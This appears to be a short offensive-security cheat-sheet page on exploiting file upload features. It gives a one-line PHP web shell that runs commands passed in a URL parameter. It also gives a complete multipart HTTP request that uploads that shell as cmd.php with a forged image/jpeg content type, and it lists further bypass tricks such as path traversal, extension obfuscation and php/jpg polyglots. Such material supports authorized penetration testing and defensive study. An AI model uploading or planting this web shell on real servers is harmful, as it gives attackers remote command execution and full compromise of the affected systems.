File uploads
Unrestricted
<?php echo system($_GET['cmd']); ?>cmd
description
Bypass file type validation
POST /path HTTP/1.1
Host: website.com
Content-Length: 1337
Content-Type: multipart/form-data; boundary=---------------------------41688721411166396114242705702
---------------------------41688721411166396114242705702
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg
<?php echo system($_GET['cmd']); ?>
---------------------------41688721411166396114242705702--Upload file to another directory (path traversal)
Bypass file type filtering
Obfuscating file extensions
Polyglot (php/jpg)
Last updated